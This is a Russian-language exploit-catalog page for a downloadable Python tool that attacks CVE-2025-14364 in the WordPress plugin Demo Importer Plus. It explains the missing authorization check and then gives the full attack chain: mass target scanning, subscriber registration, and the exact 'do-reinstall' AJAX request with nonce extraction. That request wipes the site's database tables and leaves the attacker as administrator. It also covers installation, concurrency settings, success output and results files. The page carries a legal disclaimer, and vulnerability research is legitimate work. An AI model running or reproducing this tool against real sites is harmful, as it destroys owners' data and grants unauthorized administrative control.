Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-14364 — Demo Importer Plus <= 2.0.8 - Отсутствие авторизации для аутентифицированных (Subscriber+) сброс сайта и повышение привилегий | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-14364
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-14364

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - Отсутствие авторизации для аутентифицированных (Subscriber+) сброс сайта и повышение привилегий

Репозиторий
14 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - Отсутствие проверки прав доступа к аутентифицированному (Подписчик+) сбросу сайта и повышению привилегий

CVE-2025-14364 — Demo Importer Plus · Полный сброс сайта → Повышение привилегий

root@kitploit:~
  _      _   _   _  _   _            _   _
 / \  / |_ __ ) / \  ) |_ __ /| |_|_ _) |_ |_|_
 \_ \/  |_   / \_/ /_  _)    |   |  _) |_)  |

Аутентифицированный подписчик → Администратор через AJAX-действие do-reinstall


CVE CVSS Plugin Auth Python Platform Author


〔 1 〕 Уязвимость

Основная причина:
Ajax::handle_request() регистрирует AJAX-действие demo_importer_plus без вызова current_user_can(). Любой аутентифицированный подписчик может отправить {"demo_action":"do-reinstall"}, чтобы вызвать wp_install(), которая удаляет все таблицы базы данных (кроме users / usermeta) и повторно запускает установку WordPress — автоматически назначая роль администратора аккаунту атакующего в процессе.


〔 2 〕 Схема атаки

root@kitploit:~
Режим 1 — Диагностика
  Проверка: DNS · /wp-login.php · /wp-admin/admin-ajax.php · REST /wp/v2/users
  → Определить живые цели WordPress

Режим 2 — Регистрация
  POST /wp-login.php?action=register
  → Создать аккаунт подписчика
  → Письмо с активацией отправлено на почту
     ↳ ВЫ ДОЛЖНЫ нажать на ссылку в письме перед запуском режима 3

Режим 3 — Эксплуатация
  POST /wp-login.php                         → Аутентификация как подписчик
  GET  /wp-admin/                            → Извлечь wp-rest-nonce
  POST /wp-admin/admin-ajax.php
       action=demo_importer_plus
       {"demo_action":"do-reinstall"}        → Запустить полный сброс сайта
  ← Ответ: "Site has been reset successfully"
  → Аккаунт атакующего теперь имеет роль администратора

〔 3 〕 Установка

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-14364.git
cd CVE-2025-14364
pip install -r requirements.txt
python3 CVE-2025-14364.py

requirements.txt

root@kitploit:~
aiohttp>=3.9.0
colorama>=0.4.6
urllib3>=1.26.0

〔 4 〕 Использование

root@kitploit:~
Режим [1/2/3]:           1 = Диагностика   2 = Регистрация   3 = Эксплуатация
Файл целей:              list.txt  (один хост в строке)
Параллельность:          по умолчанию 30, макс. 200
Тайм-аут:                по умолчанию 10с

Формат файла целей — list.txt:

root@kitploit:~
https://target1.com
target2.com
http://target3.com

► Режим 1 · Диагностика

Проверяет четыре конечные точки для каждого хоста и записывает чистые результаты.

root@kitploit:~
Режим: 1

Вывод → diagnostics_results.txt · passed_targets.txt


► Режим 2 · Регистрация

root@kitploit:~
Режим: 2
Email:    [email protected]
Имя пользователя: Nxploited
Пароль: NxploitedSA

Проверьте свой почтовый ящик и нажмите ссылку активации перед запуском режима 3.

Вывод → register_results.txt


► Режим 3 · Эксплуатация

root@kitploit:~
Режим: 3
Имя пользователя: Nxploited
Пароль: NxploitedSA

При успехе инструмент выводит:

root@kitploit:~
[HH:MM:SS] SUCCESS  "success":true,"message":"Site has been reset successfully" -> https://target.com

И записывает в exploit_results.txt:

root@kitploit:~
https://target.com/wp-login.php  site:...  user:Nxploited  pass:NxploitedSA  type:admin

〔 5 〕 Выходные файлы


〔 6 〕 Технические детали

Уязвимый запрос:

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1
Content-Type: application/json
X-WP-Nonce: <extracted_nonce>

{"demo_action":"do-reinstall"}

Успешный ответ:

root@kitploit:~
{"success": true, "data": {"message": "Site has been reset successfully"}}

Извлечение nonce — два запасных источника:

root@kitploit:~
wpApiSettings.nonce              (из кода страницы /wp-admin/)
elementorOneSettingsData.wpRestNonce   (запасной)

〔 7 〕 Автор и контакты

root@kitploit:~
Автор   : Nxploited (Khaled Alenazi)
GitHub   : https://github.com/Nxploited
Telegram : @KNxploited

GitHub Telegram


〔 8 〕 Отказ от ответственности

root@kitploit:~
ДАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ВЫПУСКАЕТСЯ СТРОГО ДЛЯ ИССЛЕДОВАНИЙ В ОБЛАСТИ БЕЗОПАСНОСТИ И ОБРАЗОВАНИЯ.

Автор не несёт никакой ответственности за любые действия, совершённые с помощью этого инструмента
против систем, которыми оператор не владеет или на тестирование которых не имеет явного письменного
разрешения.

Несанкционированное использование против сторонних систем нарушает законы о компьютерных преступлениях
в большинстве юрисдикций (CFAA, CMA и аналогичные по всему миру) и может привести к уголовному
преследованию.

Только вы несёте ответственность за наличие законного разрешения перед запуском этого инструмента
против любой цели.

© 2025 Nxploited · Только исследования безопасности · Demo Importer Plus ≤ 2.0.8 · Исправлено в версии 2.0.9
Скачать инструмент
CVECVE-2025-14364
CVSS v3.18.8 HIGH — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ПлагинDemo Importer Plus
Затронутые версииВсе версии ≤ 2.0.8
Необходимая аутентификацияПодписчик (самая низкая зарегистрированная роль)
ТипОтсутствие проверки прав доступа → Полный сброс сайта → Повышение привилегий
CWECWE-862 · Missing Authorization
ФайлСодержимое
diagnostics_results.txtПолные результаты проверки в JSON для каждой цели
passed_targets.txtЧистые цели (ошибки не обнаружены)
register_results.txtЗаписи попыток регистрации
exploit_results.txtЛогин · nonce · результаты сброса · подтверждённые попадания администратора
reset_results.txtСырой ответ do-reinstall для каждой цели